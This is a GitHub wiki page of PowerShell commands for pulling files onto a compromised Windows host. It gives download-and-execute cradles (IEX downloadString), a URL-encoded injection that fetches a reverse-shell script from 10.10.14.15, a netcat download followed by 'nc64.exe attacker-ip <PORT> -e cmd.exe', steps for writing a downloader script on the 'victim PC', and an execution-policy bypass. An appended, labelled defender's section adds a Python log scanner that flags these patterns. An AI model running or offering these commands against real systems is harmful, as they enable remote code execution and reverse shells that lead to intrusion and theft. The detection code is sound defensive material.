File transfer PowerShell
lethanhtung01011980 edited this page Apr 23, 2020 · 14 revisions
- For Win7, 2008 and above
- Support PowerShell
Normally used in remote execution
- Download file to the exact folder:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<script>')"
PowerShell full paths:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
- In web URL:
C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1')
If already at a PowerShell prompt
- To run
IEX(New-Object Net.WebClient).downloadString('http://<script>')
- powershell "wget http://attacker_ip/nc64.exe -OutFile nc64.exe"
nc64.exe attacker-ip <PORT> -e cmd.exe
To create the file "wget.ps1" on the victim PC
- echo $storageDir = $pwd > wget.ps1
- echo $webclient = New-Object System.Net.WebClient >>wget.ps1
- echo $url = "http://attacker_ip/nc.exe" >>wget.ps1
- echo $file = "new-exploit.exe" >>wget.ps1
- echo $webclient.DownloadFile($url,$file) >>wget.ps1
To run the script to download the file
- powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
- To copy content of the above file in a non-interactive remote shell
- To execute and download a file
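A defender's view of the commands above, as an added example that is not part of the original wiki page: a Python triage function that flags these download patterns in process command lines (for instance from Windows event 4688 or Sysmon event 1) and in URL-encoded web-server log entries. The rule names, the `scan` function and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the download commands listed on this page (case-insensitive).
RULES = {
    "webclient_download": re.compile(r"webclient\)?\s*\.\s*download(file|string)", re.I),
    "iex_remote": re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I),
    "wget_outfile": re.compile(r"\b(wget|curl|iwr|invoke-webrequest)\b.*-outfile", re.I),
    "policy_bypass": re.compile(r"-(executionpolicy|exec|ep)\s+bypass", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def scan(cmdline):
    """Return (sorted rule names, sorted URLs) found in one logged command line."""
    hits, urls = set(), set()
    # Check the raw text and its URL-decoded form: a command injected through
    # a web request is logged percent-encoded, with '+' standing for spaces.
    for form in {cmdline, unquote_plus(cmdline)}:
        for name, rx in RULES.items():
            if rx.search(form):
                hits.add(name)
        urls.update(URL_RE.findall(form))
    return sorted(hits), sorted(urls)


# Constructed sample lines modelled on the commands on this page.
SAMPLES = [
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')",
    r"C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object"
    r"+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1')",
    r'powershell "wget http://192.0.2.10/nc64.exe -OutFile nc64.exe"',
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Windows\Temp",  # benign
]

if __name__ == "__main__":
    for line in SAMPLES:
        hits, urls = scan(line)
        print(f"{'ALERT' if hits else 'ok':5} {hits} {urls}")
```

Command-line matching of this kind misses obfuscated or encoded invocations; PowerShell script block logging (event ID 4104) records the script text that actually runs and is the better source for those.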